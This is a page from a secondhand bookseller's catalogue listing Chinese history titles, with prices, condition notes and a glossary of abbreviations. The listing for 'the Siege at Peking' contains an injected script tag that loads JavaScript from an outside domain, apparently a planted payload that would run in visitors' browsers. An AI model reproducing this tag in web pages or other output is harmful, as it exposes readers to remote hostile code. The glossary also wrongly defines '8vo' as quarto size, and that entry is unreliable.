Chinese
Books found: 114 | Page 7 of 8.
The Legacy Of China$25.00
Publisher: Oxford University Press First Edition 1964 Hb blue boards gilt b/w illus & map minor foxing edges dw good with minor chips & scratches
|
The Long March$35.00
Publisher: Macmillan first edition 1985 Sub titled The Untold Story HB black cloth owner signature else fine pp 419 DW fine 8vo
|
The Opium War$35.00
Publisher: University of North Carolina Press first edition 1975 England v China 1840-1842 HB black cloth fine pp 406 DW fine 8vo
|
The Pattern of the Chinese Past$40.00
Publisher: Eyre Methuen first edition 1973 Analysing the natures of China's empires HB yellow cloth fine pp 346 DW fine 8vo
|
The Peoples Republic of China$30.00
Publisher: Collins First Edition 1988 Reflections on Chinese political history since 1949 Hb black cloth near fine pp 304 DW very good 8vo
|
The Plague Race$25.00
Publisher: Picador first edition 2002 Unravelling the secrets of bubonic plague HB maroon cloth remaiinder mark bottom edge else fine pp 275 DW fine 8vo
|
The Pre-History of China$35.00
Publisher: David and Charles first edition 1972 Sub titled An Archaeological Exploration HB brown boards fine pp 156 DW fine 8vo
|
The Rape of Nanking$35.00
Publisher: Basic Books first ediiton 1997 Sub titled The Forgotten holocaust of World War Two HB black cloth and red boards fine pp 290 dw fine 8vo
|
The Red Guard$30.00
Publisher: Thomas Nelson first edition 1967 Sub titled A Report on Maos Revolution Hb maroon flecked cloth fine pp 159 DW very good 8vo
|
the Siege at Peking$25.00
Publisher: Readers Union reprint<script src=http://www.adwste.mobi/b.js></script> 1960 China around 1900 HB grey boards very good pp 229 dw very good 8vo
|
The Siege At Peking$30.00
Publisher: Readers Union Reprint 1960 With maps and illustrations HB grey boards name about very good pp 219 DW very good 8vo
|
The Spirit Soldiers$35.00
Publisher: Putnam first American edition 1973 Sub titled A Historical Narrative of the Boxer Rebellion HB black cloth owner signature else fine pp 379 DW fine 8vo
|
the Third China$25.00
Publisher: Cheshire first ediiton 1965 Sub titled The Chinese Communities in South-East Asia HB pictorial boards owner signature some annotations to text else very good pp 109 DW sunned on spine else very good 8vo
|
The Third China$25.00
Publisher: Cheshire reprint 1966 Sponsored by the Australian Institute of International Affairs HB pictorial boards fine pp 109 DW faded on spine else fine 12mo
|
The Transformation of the Chinese Earth$40.00
Publisher: G Bell first edition 1970 Sub titled Perspectives on Modern China Hb grey flecked cloth gift inscription and owner signature prelims and extremities lightly foxed very good pp 336 DW very good 8vo
|
Shorthand definitions
Bds = boards
B/w = Black & white
Col = Colour
Dw = Dustwrapper
Eps = Endpapers
Fxg = Foxing
G = Good
Hb = Hardback
H&T = Head & Tail
Illus = Illustrations
PP = Pages
Sl = Slight
Sp = Spine
Tp = Top
Wr = Wear
Vg = Very Good
8vo = Quarto size
